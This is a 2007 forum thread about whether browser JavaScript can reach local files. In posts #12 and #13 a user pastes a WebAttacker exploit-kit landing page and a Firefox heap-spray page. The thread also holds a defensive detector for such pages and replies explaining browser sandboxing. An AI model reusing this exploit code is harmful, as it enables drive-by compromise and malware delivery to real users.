Is it possible to run a command on the client computer ?

I saw here

http://java.sun.com/javase/6/docs/te...ocs/index.html

that javascript has built-in methods such as cp, dir, date etc

how do i get these to run on the client computer ?

the client will be linux or osx .

May 24 '07 #1
Lee
navti said:
> I saw here
>
> http://java.sun.com/javase/6/docs/te...ocs/index.html
>
> that javascript has built-in methods such as cp, dir, date etc
>
> how do i get these to run on the client computer ?

That page describes Javascript methods available in jrunscript,
which is not the engine you'll find in a web browser.

May 24 '07 #2
On May 24, 4:42 pm, Lee <REM0VElbspamt...@cox.net> wrote:
> navti said:
>> I saw here
>> http://java.sun.com/javase/6/docs/te...e/jsdocs/index....
>> that javascript has built-in methods such as cp, dir, date etc
>> how do i get these to run on the client computer ?
>
> That page describes Javascript methods available in jrunscript,
> which is not the engine you'll find in a web browser.

ok. so how do i do a dir of a directory and display it in the
browser ?

May 24 '07 #3
On Thu, 24 May 2007 08:44:41 -0700, navti wrote:
> On May 24, 4:42 pm, Lee <REM0VElbspamt...@cox.net> wrote:
>> navti said:
>>> I saw here
>>> http://java.sun.com/javase/6/docs/te...e/jsdocs/index....
>>> that javascript has built-in methods such as cp, dir, date etc
>>> how do i get these to run on the client computer ?
>>
>> That page describes Javascript methods available in jrunscript, which
>> is not the engine you'll find in a web browser.
>
> ok. so how do i do a dir of a directory and display it in the browser ?

You do not have access to the local machine without having an extension
allowing that access installed on the local machine.
May 24 '07 #4
navti <na****@gmail.com> wrote in
news:11**********************@p47g2000hsd.googlegroups.com:

>>> that javascript has built-in methods such as cp, dir, date etc
>>> how do i get these to run on the client computer ?
>>
>> That page describes Javascript methods available in jrunscript,
>> which is not the engine you'll find in a web browser.
>
> ok. so how do i do a dir of a directory and display it in the
> browser ?

can you think of the absolute mayhem that would arise if websites could
create/alter the filesystem of the computer that the web browser/client is
on????

there is good reason that that sort of thing is not permitted with plain
ol' javascript.

May 24 '07 #5
On May 24, 5:09 pm, Good Man <h...@letsgo.com> wrote:
> navti <nav...@gmail.com> wrote in news:11**********************@p47g2000hsd.googlegroups.com:
>>>> that javascript has built-in methods such as cp, dir, date etc
>>>> how do i get these to run on the client computer ?
>>> That page describes Javascript methods available in jrunscript,
>>> which is not the engine you'll find in a web browser.
>> ok. so how do i do a dir of a directory and display it in the
>> browser ?
>
> can you think of the absolute mayhem that would arise if websites could
> create/alter the filesystem of the computer that the web browser/client is
> on????
>
> there is good reason that that sort of thing is not permitted with plain
> ol' javascript.

i visited a website of an enemy and he not only did a listing of my
local files he also copied them to his server. im pretty certain he
was using javascript.

May 24 '07 #6
On Thu, 24 May 2007 10:37:03 -0700, navti wrote:
> On May 24, 5:09 pm, Good Man <h...@letsgo.com> wrote:
>> navti <nav...@gmail.com> wrote in news:11**********************@p47g2000hsd.googlegroups.com:
>>>>> that javascript has built-in methods such as cp, dir, date etc
>>>>> how do i get these to run on the client computer ?
>>>> That page describes Javascript methods available in jrunscript,
>>>> which is not the engine you'll find in a web browser.
>>> ok. so how do i do a dir of a directory and display it in the
>>> browser ?
>>
>> can you think of the absolute mayhem that would arise if websites could
>> create/alter the filesystem of the computer that the web browser/client is
>> on????
>>
>> there is good reason that that sort of thing is not permitted with plain
>> ol' javascript.
>
> i visited a website of an enemy and he not only did a listing of my
> local files he also copied them to his server. im pretty certain he
> was using javascript.

No, he was not... and you must have your browser set to trust anything
that it downloads.

May 24 '07 #7
On May 24, 6:43 pm, Ivan Marsh <anno...@you.now> wrote:
> On Thu, 24 May 2007 10:37:03 -0700, navti wrote:
>> On May 24, 5:09 pm, Good Man <h...@letsgo.com> wrote:
>>> navti <nav...@gmail.com> wrote in news:11**********************@p47g2000hsd.googlegroups.com:
>>>>>> that javascript has built-in methods such as cp, dir, date etc
>>>>>> how do i get these to run on the client computer ?
>>>>> That page describes Javascript methods available in jrunscript,
>>>>> which is not the engine you'll find in a web browser.
>>>> ok. so how do i do a dir of a directory and display it in the
>>>> browser ?
>>> can you think of the absolute mayhem that would arise if websites could
>>> create/alter the filesystem of the computer that the web browser/client is
>>> on????
>>> there is good reason that that sort of thing is not permitted with plain
>>> ol' javascript.
>> i visited a website of an enemy and he not only did a listing of my
>> local files he also copied them to his server. im pretty certain he
>> was using javascript.
>
> No, he was not...

it all happened automatically without any intervention. i was using
win2k and ie6 at the time. i have since switched to mac os x.

have you seen the code of webattacker ?

i havent but is it not mostly javascript ?

May 24 '07 #8
On May 24, 4:22 pm, navti <nav...@gmail.com> wrote:
> On May 24, 6:43 pm, Ivan Marsh <anno...@you.now> wrote:
>> On Thu, 24 May 2007 10:37:03 -0700, navti wrote:
>>> On May 24, 5:09 pm, Good Man <h...@letsgo.com> wrote:
>>>> navti <nav...@gmail.com> wrote in news:11**********************@p47g2000hsd.googlegroups.com:
>>>>>>> that javascript has built-in methods such as cp, dir, date etc
>>>>>>> how do i get these to run on the client computer ?
>>>>>> That page describes Javascript methods available in jrunscript,
>>>>>> which is not the engine you'll find in a web browser.
>>>>> ok. so how do i do a dir of a directory and display it in the
>>>>> browser ?
>>>> can you think of the absolute mayhem that would arise if websites could
>>>> create/alter the filesystem of the computer that the web browser/client is
>>>> on????
>>>> there is good reason that that sort of thing is not permitted with plain
>>>> ol' javascript.
>>> i visited a website of an enemy and he not only did a listing of my
>>> local files he also copied them to his server. im pretty certain he
>>> was using javascript.
>> No, he was not...
>
> it all happened automatically without any intervention. i was using
> win2k and ie6 at the time. i have since switched to mac os x.
>
> have you seen the code of webattacker ?
>
> i havent but is it not mostly javascript ?

There is a way to show all the folders of your c: drive in an iframe.
Is this what happened? Did it show your basic filesystem and merely
say it took everything? I agree with the other users, unless you
installed or accepted it cannot happen.

May 24 '07 #9
On Thu, 24 May 2007 13:22:43 -0700, navti wrote:
> On May 24, 6:43 pm, Ivan Marsh <anno...@you.now> wrote:
>> On Thu, 24 May 2007 10:37:03 -0700, navti wrote:
>>> On May 24, 5:09 pm, Good Man <h...@letsgo.com> wrote:
>>>> navti <nav...@gmail.com> wrote in news:11**********************@p47g2000hsd.googlegroups.com:
>>>>>>> that javascript has built-in methods such as cp, dir, date etc
>>>>>>> how do i get these to run on the client computer ?
>>>>>> That page describes Javascript methods available in jrunscript,
>>>>>> which is not the engine you'll find in a web browser.
>>>>> ok. so how do i do a dir of a directory and display it in the
>>>>> browser ?
>>>> can you think of the absolute mayhem that would arise if websites
>>>> could create/alter the filesystem of the computer that the web
>>>> browser/client is on????
>>>> there is good reason that that sort of thing is not permitted with
>>>> plain ol' javascript.
>>> i visited a website of an enemy and he not only did a listing of my
>>> local files he also copied them to his server. im pretty certain he
>>> was using javascript.
>>
>> No, he was not...
>
> it all happened automatically without any intervention. i was using
> win2k and ie6 at the time. i have since switched to mac os x.
>
> have you seen the code of webattacker ?
>
> i havent but is it not mostly javascript ?

I'm guessing it's mostly HTML... but you can't read the local file system
with HTML any more than you can with javascript.

You cannot get to the local machine without installing a conduit to the
local machine.

May 24 '07 #10
navti wrote:
> it all happened automatically without any intervention. i was using
> win2k and ie6 at the time. i have since switched to mac os x.
>
> have you seen the code of webattacker ?
>
> i havent but is it not mostly javascript ?

You haven't seen the code for Webattacker, yet are positive it is
JavaScript-based? Hrmm...

Anyway, no, I assure you, the problem arose from you using Internet
Explorer 6, *with* lax security settings and the code used to pervert
your system was indeed, Microsoft-specific (VBScript).

--
-Lost
Remove the extra words to reply by e-mail. Don't e-mail me. I am
kidding. No I am not.
May 24 '07 #11
On May 24, 10:16 pm, -Lost <maventheextrawo...@techie.com> wrote:
> navti wrote:
>> it all happened automatically without any intervention. i was using
>> win2k and ie6 at the time. i have since switched to mac os x.
>> have you seen the code of webattacker ?
>> i havent but is it not mostly javascript ?
>
> You haven't seen the code for Webattacker, yet are positive it is
> JavaScript-based? Hrmm...
>
> Anyway, no, I assure you, the problem arose from you using Internet
> Explorer 6, *with* lax security settings and the code used to pervert
> your system was indeed, Microsoft-specific (VBScript).

i just found some of the webattacker code

<iframe src="http://fl4w.info/shit/index.php" width=1 height=1></
iframe>
<!--hppage status="protected"-->
<HTML xmlns:IE>
<TITLE>Demo page</TITLE>
<HEAD><SCRIPT LANGUAGE="JavaScript"><!--
document.write(unescape("%3C%53%43%52%49%50%54%20% 4C%41%4E
%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%7 4%22%3E%3C%21%2D%2D
%0D%0A%68%70%5F%6F%6B%3D%74%72%75%65%3B%66%75%6E%6 3%74%69%6F%6E
%20%68%70%5F%64%30%30%28%73%29%7B%69%66%28%21%68%7 0%5F%6F%6B
%29%72%65%74%75%72%6E%3B%64%6F%63%75%6D%65%6E%74%2 E
%77%72%69%74%65%28%73%29%7D%2F%2F%2D%2D%3E%3C%2F
%53%43%52%49%50%54%3E"));//--></SCRIPT>
<STYLE type='text/css'>
IE\:clientCaps {behavior:url(#default#clientcaps)}
</STYLE>
</HEAD>
<BODY onLoad="setTimeout('Run_BOF()',2000);"><NOSCRIPT>T o display this
page you need a browser with JavaScript support.</NOSCRIPT>
<CENTER><H1>This site is under construction...</H1></CENTER>

<IFRAME name="StatPage" width=5 height=5 style="display:none"></
IFRAME>
<IFRAME name="PageContainer" width=5 height=5 style="display:none"></
IFRAME>
<DIV id="ObjectContainer"></DIV>
<IE:clientCaps ID="oClientCaps" />
<script type="text/javascript" language="JavaScript">

var ExploitNumber=0;

function GetVersion(CLSID)
{
if (oClientCaps.isComponentInstalled(CLSID,"Component ID"))
{return
oClientCaps.getComponentVersion(CLSID,"ComponentID ").split(",");}
else
{return Array(0,0,0,0);}
}

function Get_Win_Version(IE_vers)
{
if (IE_vers.indexOf('Windows 95') != -1) return "95"
else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
else if (IE_vers.indexOf('Windows 98') != -1) return "98"
else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
}

function Run_BOF()
{
if (ExploitNumber==4)
{
self.focus();
for (i=1 ; i <=4 ; i++)
{
document.writeln('<iframe width=1 height=1 border=0
frameborder=0 src="pluginst.htm"></iframe>');
}
document.writeln('<iframe width=1 height=1 border=0
frameborder=0 src="ie0601d.htm"></iframe>');
}
}

var CGI_Script="http://jag.mews.ru/cgi-bin/ie0601.cgi";

if (navigator.appName=="Microsoft Internet Explorer")
{
Click_Request=CGI_Script+"?click";
var InetPath=document.location.href;
j=InetPath.lastIndexOf('/');
InetPath=InetPath.slice(0,j);

var IEversion=navigator.appVersion;
var IEplatform=navigator.platform;
if (IEplatform.search("Win32") != -1)
{
var WinOS=Get_Win_Version(IEversion);
FullVersion=clientInformation.appMinorVersion;
PatchList=FullVersion.split(";");
for (var i=0; i < PatchList.length; i++)
{
ServicePack=PatchList[i];
j=ServicePack.indexOf('SP');
if (j != -1)
{
ServicePack=ServicePack.substr(j);
Click_Request=Click_Request+'&'+ServicePack;
}
}
StatPage.location=Click_Request;
var JVM_vers = GetVersion("{08B0E5C0-4FCB-11CF-
AAA5-00401C608500}");
var IE_vers = GetVersion("{89820200-
ECBD-11CF-8B85-00AA005B4383}");
fNortonAV=0; fMcAfee=0; XP_SP2_patched=0;
try
{
var oNortonAV=new
ActiveXObject("NAVCfgWizDll.NAVCfgWizMgr"); //Norton Antivirus Config
Wizard initialization
fNortonAV=1;
}
catch(e){}
try
{
var oMcAfee=new ActiveXObject("McGDMgr.DwnldGroupMgr"); //
McAfee Security Download Control initialization
fMcAfee=1;
}
catch(e){}

switch (WinOS)
{
case "2K":
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM =
5.0.3810.0 or higher
{
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=2; }
}
break;
case "2K3":
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=4; }
break;
case "XP":

if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if
JVM = 5.0.3810.0 or higher
{
for (var i=0; i < PatchList.length; i+
+)
{
if (PatchList[i]=="SP2")
{ XP_SP2_patched=1; }

}
if (XP_SP2_patched==0)
{
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=4; }
}
else
{
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=5; }
else
{ ExploitNumber=4; }
}
}
break;
default:
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else
{ ExploitNumber=2; } // if JVM =
5.0.3810.0 or higher

break;
}
// launching exploit which number is depends on Windows and
IE versions

switch (ExploitNumber)
{
case 1:
Trojan_Path=CGI_Script+"?exploit=MS03-11";
ObjectContainer.innerHTML='<applet
archive="'+InetPath+'/'+'ie0601a.jar" codebase="'+InetPath+'"
code="TakePrivileges.class" width=1 height=1><param name="ModulePath"
value="'+Trojan_Path+'"></applet>';
break;
case 2:
CHM_base='//ie0601b.chm'+'::'+'/main.htm';
Protocol=unescape("%6ds-i%74s:%6dh%74%6dl:");
Init_String=Protocol+'file://'+'C:\\MAIN.MHT!'+InetPath+CHM_base;
oMSITS=document.createElement("<OBJECT
data='"+Init_String+"' type='text/x-scriptlet'></OBJECT>");
document.body.appendChild(oMSITS);
document.title="Loaded !";
break;
case 3:
window.open("ie0601c.htm","Info","left=2000,top=20 00,screenX=2000,screenY=2000,width=50,height=50,sc rollbars=1,menubar=0,titlebar=0,toolbar=0,status=0 ");
self.focus();
break;
case 4:
;setTimeout('Run_BOF()',2000);
break;
case 5:
PageContainer.location="ie0601e.wmf";
break;
default:
break;
}

}
}
else if (navigator.appName=="Netscape")
{
StatPage.location=CGI_Script+"?click";
if (navigator.userAgent.indexOf('Firefox') != -1)
{
PageContainer.location="mfsa0601.htm";
}
}
else
{
StatPage.location=CGI_Script+"?click";
}
</script>
</BODY>
</HTML>
May 24 '07 #12
this is mfsa0601.htm

<!--hppage status="protected"-->
<HTML><HEAD><SCRIPT LANGUAGE="JavaScript"><!--
document.write(unescape("%3C%53%43%52%49%50%54%20% 4C%41%4E
%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%7 4%22%3E%3C%21%2D%2D
%0D%0A%68%70%5F%6F%6B%3D%74%72%75%65%3B%66%75%6E%6 3%74%69%6F%6E
%20%68%70%5F%64%30%30%28%73%29%7B%69%66%28%21%68%7 0%5F%6F%6B
%29%72%65%74%75%72%6E%3B%64%6F%63%75%6D%65%6E%74%2 E
%77%72%69%74%65%28%73%29%7D%2F%2F%2D%2D%3E%3C%2F
%53%43%52%49%50%54%3E"));//--></SCRIPT><SCRIPT language="javascript">
var Shellcode=unescape("[encoded payload omitted]");
function Run_BOF() {
var heapSprayToAddress=0x12000000;
var heapBlockSize=0x400000;
var ShellcodeSize=Shellcode.length * 2;
var spraySlideSize=heapBlockSize-(ShellcodeSize+0x38);
var spraySlide1 = unescape("%u002C%u11C0");
spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize);
var spraySlide2 = unescape("%u002C%u1200");
spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize);
var spraySlide3 = unescape("%u9090%u9090");
spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize);
heapBlocks=(heapSprayToAddress-0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{ memory[i]=(i%3==0) ? spraySlide1 + Shellcode:
(i%3==1) ? spraySlide2 + Shellcode: spraySlide3 + Shellcode; }
location.href="javascript:void (new InstallVersion());";
var eaxAddress = 0x1180002C;
(new InstallVersion).compareTo(new Number(eaxAddress >1));
}
function getSpraySlide(spraySlide, spraySlideSize) {
while (spraySlide.length*2<spraySlideSize)
{ spraySlide+=spraySlide; }
spraySlide=spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
</SCRIPT></HEAD>
<BODY onload="Run_BOF()"><NOSCRIPT>To display this page you need a
browser with JavaScript support.</NOSCRIPT></BODY></HTML>
</HTML>

May 24 '07 #13
navti wrote:
> On May 24, 10:16 pm, -Lost <maventheextrawo...@techie.com> wrote:
>> navti wrote:
>>> it all happened automatically without any intervention. i was using
>>> win2k and ie6 at the time. i have since switched to mac os x.
>>> have you seen the code of webattacker ?
>>> i havent but is it not mostly javascript ?
>> You haven't seen the code for Webattacker, yet are positive it is
>> JavaScript-based? Hrmm...
>>
>> Anyway, no, I assure you, the problem arose from you using Internet
>> Explorer 6, *with* lax security settings and the code used to pervert
>> your system was indeed, Microsoft-specific (VBScript).
> i just found some of the webattacker code

<snip code>

OK, rather than say VBScript is the main culprit, I should have said
ActiveX.

All that JavaScript does is pry and develop identifying data to pass to
either a CGI script or to an ActiveX control (apparently to mess with
McAfee?).

--
-Lost
Remove the extra words to reply by e-mail. Don't e-mail me. I am
kidding. No I am not.
May 24 '07 #14
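
The traits visible in the two pages posted above (tiny or hidden iframes, markup written through `document.write(unescape(...))`, `ActiveXObject` probes wrapped in try/catch, clientCaps component checks, long runs of `%u` units) can be checked statically in a saved copy of a page. The following is an added example, not part of the thread or of any poster's code; the patterns, thresholds, function names and the constructed sample are assumptions, and `%u` runs are only counted, never decoded.

```javascript
// Added example: static triage of saved HTML for the traits seen in the
// pages posted in this thread. Patterns and thresholds are assumptions.

// Decode %XX escapes only (whitespace inserted by mail/forum wrapping is
// dropped first). %uXXXX units are left as text and never interpreted.
function decodePercentBytes(s) {
  return s.replace(/\s+/g, '')
          .replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Read a numeric HTML attribute (quoted or bare); null when absent.
function numAttr(tag, name) {
  const m = new RegExp('\\b' + name + '\\s*=\\s*["\']?(\\d+)', 'i').exec(tag);
  return m ? Number(m[1]) : null;
}

function triage(html) {
  const findings = {
    hiddenIframes: [],      // iframe tags that are <= 5x5 or display:none
    writtenMarkup: [],      // decoded arguments of document.write(unescape("..."))
    activeXProbes: [],      // ProgIDs passed to new ActiveXObject(...)
    componentChecks: false, // clientCaps-style installed-component queries
    encodedRuns: [],        // length (in units) of each long %uXXXX run
  };

  for (const [tag] of html.matchAll(/<iframe\b[^>]*>/gi)) {
    const w = numAttr(tag, 'width');
    const h = numAttr(tag, 'height');
    const tiny = w !== null && h !== null && w <= 5 && h <= 5;
    if (tiny || /display\s*:\s*none/i.test(tag)) findings.hiddenIframes.push(tag);
  }

  const writeRe = /document\.write(?:ln)?\s*\(\s*unescape\s*\(\s*(["'])([\s\S]*?)\1/gi;
  for (const m of html.matchAll(writeRe)) {
    findings.writtenMarkup.push(decodePercentBytes(m[2]));
  }

  for (const m of html.matchAll(/new\s+ActiveXObject\s*\(\s*(["'])([^"']+)\1/gi)) {
    findings.activeXProbes.push(m[2]);
  }

  findings.componentChecks =
    /\b(?:isComponentInstalled|getComponentVersion)\s*\(/.test(html);

  // 16 or more consecutive %uXXXX units: report the count, not the content.
  for (const [run] of html.matchAll(/(?:%u[0-9a-fA-F]{4}\s*){16,}/g)) {
    findings.encodedRuns.push(run.match(/%u/g).length);
  }
  return findings;
}

// Names of the traits that fired, for a one-line summary.
function traits(f) {
  const out = [];
  if (f.hiddenIframes.length) out.push('hidden-iframe');
  if (f.writtenMarkup.length) out.push('write-unescape');
  if (f.activeXProbes.length) out.push('activex-probe');
  if (f.componentChecks) out.push('component-version-check');
  if (f.encodedRuns.length) out.push('long-%u-run');
  return out;
}

// Constructed, inert sample (placeholder host, ProgID, CLSID and filler units).
const SAMPLE = [
  '<iframe src="http://example.invalid/a" width=1 height=1></iframe>',
  '<iframe name="s" width=5 height=5 style="display:none"></iframe>',
  '<iframe src="/docs" width=600 height=400></iframe>',
  '<script>',
  'document.write(unescape("%3C%62%3E%68%69%3C%2F%62%3E"));',
  'try { var o = new ActiveXObject("Example.Placeholder"); f = 1; } catch (e) {}',
  'var v = oClientCaps.getComponentVersion("{00000000-0000-0000-0000-000000000000}", "ComponentID");',
  'var blob = unescape("' + '%u4141'.repeat(40) + '");',
  '</script>',
].join('\n');

console.log(traits(triage(SAMPLE)).join(', '));
```
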
On May 24, 10:55 pm, -Lost <maventheextrawo...@techie.com> wrote:
> navti wrote:
>> On May 24, 10:16 pm, -Lost <maventheextrawo...@techie.com> wrote:
>>> navti wrote:
>>>> it all happened automatically without any intervention. i was using
>>>> win2k and ie6 at the time. i have since switched to mac os x.
>>>> have you seen the code of webattacker ?
>>>> i havent but is it not mostly javascript ?
>>> You haven't seen the code for Webattacker, yet are positive it is
>>> JavaScript-based? Hrmm...
>>> Anyway, no, I assure you, the problem arose from you using Internet
>>> Explorer 6, *with* lax security settings and the code used to pervert
>>> your system was indeed, Microsoft-specific (VBScript).
>> i just found some of the webattacker code
>
> <snip code>
>
> OK, rather than say VBScript is the main culprit, I should have said
> ActiveX.
>
> All that JavaScript does is pry and develop identifying data to pass to
> either a CGI script or to an ActiveX control (apparently to mess with
> McAfee?).
>
> --
> -Lost
> Remove the extra words to reply by e-mail. Don't e-mail me. I am
> kidding. No I am not.

ok. so there is no way javascript can read a clients local files ?

May 24 '07 #15
navti <na****@gmail.com> wrote:
> i visited a website of an enemy and he not only did a listing of my
> local files he also copied them to his server. im pretty certain he
> was using javascript.

He could display a list of your files just by referring your browser
to a URL of file:///c:/ or something like that. That would cause your
browser (IE, at any rate) to show you what's on your disk. Your
"attacker" would never see this, it's simply your browser reading your
disk and showing you the result. In a normal security environment,
there's nothing in Javascript to collect this data and send it
anywhere.

--
Tim Slattery
Sl********@bls.gov
http://members.cox.net/slatteryt
May 24 '07 #16
On May 25, 7:39 am, navti <nav...@gmail.com> wrote:
> On May 24, 10:16 pm, -Lost <maventheextrawo...@techie.com> wrote:
>> navti wrote:
>>> it all happened automatically without any intervention. i was using
>>> win2k and ie6 at the time. i have since switched to mac os x.
> ....
> if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
> { ExploitNumber=1; }
> else // if JVM = 5.0.3810.0 or higher

The (dreaded) MSVM.

If this script found a 3809 or previous build MSVM, it
might have taken advantage (using a Java applet) of any
number of security holes in those Microsoft VM's. Even
the 3810 build has existing security issues that will
never be fixed.

Microsoft themselves (who made the MSVM) recommend
upgrading to the Sun Java Plug-In. When security
issues are discovered in the Java Plug-In - they
are fixed quickly, and the end users are prompted
to update.

Note those comments have little to do with Javascript,
it is Java (a different language) that runs in the MSVM
and the Java Plug-In. The script is apparently attempting
to determine what the applet should attack - though the
author might have taken a simpler approach that required
no javascript.

I suspect, however, that one of the other posters got
the answer right when they suggested the host had done
something to make it *appear* to you that information
had been stolen (linking to a common directory on C:
drive would be enough to convince most people who
use IE).

Andrew T.

May 25 '07 #17
On May 25, 5:13 am, Andrew Thompson <andrewtho...@gmail.com> wrote:
> On May 25, 7:39 am, navti <nav...@gmail.com> wrote:
>> On May 24, 10:16 pm, -Lost <maventheextrawo...@techie.com> wrote:
>>> navti wrote:
>>>> it all happened automatically without any intervention. i was using
>>>> win2k and ie6 at the time. i have since switched to mac os x.
>> ...
>> if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
>> { ExploitNumber=1; }
>> else // if JVM = 5.0.3810.0 or higher
>
> The (dreaded) MSVM.
>
> If this script found a 3809 or previous build MSVM, it
> might have taken advantage (using a Java applet) of any
> number of security holes in those Microsoft VM's. Even
> the 3810 build has existing security issues that will
> never be fixed.
>
> Microsoft themselves (who made the MSVM) recommend
> upgrading to the Sun Java Plug-In. When security
> issues are discovered in the Java Plug-In - they
> are fixed quickly, and the end users are prompted
> to update.
>
> Note those comments have little to do with Javascript,
> it is Java (a different language) that runs in the MSVM
> and the Java Plug-In. The script is apparently attempting
> to determine what the applet should attack - though the
> author might have taken a simpler approach that required
> no javascript.
>
> I suspect, however, that one of the other posters got
> the answer right when they suggested the host had done
> something to make it *appear* to you that information
> had been stolen (linking to a common directory on C:
> drive would be enough to convince most people who
> use IE).
>
> Andrew T.

he stole my files . i know this for a fact.
why would you think it was otherwise ? have you been living down a
mineshaft for the past 5 years ? never heard of xss ? are you in some
sort of state of denial ?
only an ignoramus would try and deny it was possible for a webserver
to compromise a client's machine.

my mistake is thinking javascript was enough . obviously it was a
combination of javascript, java, activex , php , xml etc etc

May 25 '07 #18
navti wrote:
> On May 25, 5:13 am, Andrew Thompson <andrewtho...@gmail.com> wrote:
>> On May 25, 7:39 am, navti <nav...@gmail.com> wrote:
>>> On May 24, 10:16 pm, -Lost <maventheextrawo...@techie.com> wrote:
>>>> navti wrote:
>>>>> it all happened automatically without any intervention. i was
>>>>> using win2k and ie6 at the time. i have since switched to mac os
>>>>> x.
>>> ...
>>> if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
>>> { ExploitNumber=1; }
>>> else // if JVM = 5.0.3810.0 or higher
>>
>> The (dreaded) MSVM.
>> <snipped/>
>
> he stole my files . i know this for a fact.
> why would you think it was otherwise ? have you been living down a
> mineshaft for the past 5 years ? never heard of xss ? are you in some
> sort of state of denial ?
> only an ignoramus would try and deny it was possible for a webserver
> to compromise a client's machine.
>
> my mistake is thinking javascript was enough . obviously it was a
> combination of javascript, java, activex , php , xml etc etc

JavaScript, php, xml and etc. do not have *anything* to do with it!

The only way a webserver can compromise a client in the way you described
is either:
1.) A signed Java Applet where you explicitly have answered "Yes" when
    asked if you wanted to let the applet run.
2.) A signed ActiveX control where you explicitly have answered "Yes" when
    asked if you wanted to let the control run.
3.) Any ActiveX control, and you have the security settings of your browser
    wide-open.

Neither PHP nor JavaScript is able to access your files.

--
Dag.
May 25 '07 #19

> The only way a webserver can compromise a client in the way you described
> is either:
> 1.) A signed Java Applet where you explicitly have answered "Yes" when
>     asked if you wanted to let the applet run.
> 2.) A signed ActiveX control where you explicitly have answered "Yes" when
>     asked if you wanted to let the control run.
> 3.) Any ActiveX control, and you have the security settings of your browser
>     wide-open.
>
> Neither PHP nor JavaScript is able to access your files.

what about drive by downloads where the client simply has to visit a
malicious web site to be compromised ? you know that the client doesnt
have to do anything to give up his data to a malicious website so why
are you denying it ?

May 25 '07 #20
Lee
navti said:
>> The only way a webserver can compromise a client in the way you described
>> is either:
>> 1.) A signed Java Applet where you explicitly have answered "Yes" when
>>     asked if you wanted to let the applet run.
>> 2.) A signed ActiveX control where you explicitly have answered "Yes" when
>>     asked if you wanted to let the control run.
>> 3.) Any ActiveX control, and you have the security settings of your browser
>>     wide-open.
>>
>> Neither PHP nor JavaScript is able to access your files.
>
> what about drive by downloads where the client simply has to visit a
> malicious web site to be compromised ? you know that the client doesnt
> have to do anything to give up his data to a malicious website so why
> are you denying it ?

You know this for a fact? Can you name such a site?
Or did this happen to a friend of a friend?

May 25 '07 #21
rf
"navti" <na****@gmail.com> wrote in message
news:11**********************@p77g2000hsh.googlegroups.com...
> what about drive by downloads where the client simply has to visit a
> malicious web site to be compromised ? you know that the client doesnt
> have to do anything to give up his data to a malicious website so why
> are you denying it ?

If your system is so insecure that this can happen then you should unplug
your system from the internet. It's unsafe.
May 25 '07 #22
On May 25, 10:53 am, Lee <REM0VElbspamt...@cox.net> wrote:
> navti said:
>>> The only way a webserver can compromise a client in the way you described
>>> is either:
>>> 1.) A signed Java Applet where you explicitly have answered "Yes" when
>>>     asked if you wanted to let the applet run.
>>> 2.) A signed ActiveX control where you explicitly have answered "Yes" when
>>>     asked if you wanted to let the control run.
>>> 3.) Any ActiveX control, and you have the security settings of your browser
>>>     wide-open.
>>> Neither PHP nor JavaScript is able to access your files.
>> what about drive by downloads where the client simply has to visit a
>> malicious web site to be compromised ? you know that the client doesnt
>> have to do anything to give up his data to a malicious website so why
>> are you denying it ?
>
> You know this for a fact? Can you name such a site?
> Or did this happen to a friend of a friend?

it happened to me on windoze which is why i scrapped windoze for mac
os x and linux.

you guys are seriously trying to tell me you have never heard of
these kind of attacks ?

i suggest you visit some security websites to see how prevalent they
are and how easy they seem to be to execute.

May 25 '07 #23
On May 25, 11:20 am, "rf" <r...@invalid.com> wrote:
> "navti" <nav...@gmail.com> wrote in message
> news:11**********************@p77g2000hsh.googlegroups.com...
>> what about drive by downloads where the client simply has to visit a
>> malicious web site to be compromised ? you know that the client doesnt
>> have to do anything to give up his data to a malicious website so why
>> are you denying it ?
>
> If your system is so insecure that this can happen then you should unplug
> your system from the internet. It's unsafe.

i did, it was called windows and i replaced it with a secure system
called os x,

May 25 '07 #24
navti wrote:
>> The only way a webserver can compromise a client in the way you
>> described is either:
>> 1.) A signed Java Applet where you explicitly have answered
>>     "Yes" when asked if you wanted to let the applet run.
>> 2.) A signed ActiveX control where you explicitly have answered
>>     "Yes" when asked if you wanted to let the control run.
>> 3.) Any ActiveX control, and you have the security settings of
>>     your browser wide-open.
>>
>> Neither PHP nor JavaScript is able to access your files.
>
> what about drive by downloads where the client simply has to visit a
> malicious web site to be compromised ? you know that the client doesnt
> have to do anything to give up his data to a malicious website so why
> are you denying it ?

Prove it!

Prove it by posting a link to such a site, and I'll go there myself
with all my different browsers to see if you are right!

--
Dag.
May 25 '07 #25
navti wrote:
> On May 25, 10:53 am, Lee <REM0VElbspamt...@cox.net> wrote:
>> navti said:
>>>> The only way a webserver can compromise a client in the way you
>>>> described is either:
>>>> 1.) A signed Java Applet where you explicitly have answered
>>>>     "Yes" when asked if you wanted to let the applet run.
>>>> 2.) A signed ActiveX control where you explicitly have
>>>>     answered "Yes" when asked if you wanted to let the control run.
>>>> 3.) Any ActiveX control, and you have the security settings of
>>>>     your browser wide-open.
>>>> Neither PHP nor JavaScript is able to access your files.
>>> what about drive by downloads where the client simply has to visit a
>>> malicious web site to be compromised ? you know that the client
>>> doesnt have to do anything to give up his data to a malicious
>>> website so why are you denying it ?
>>
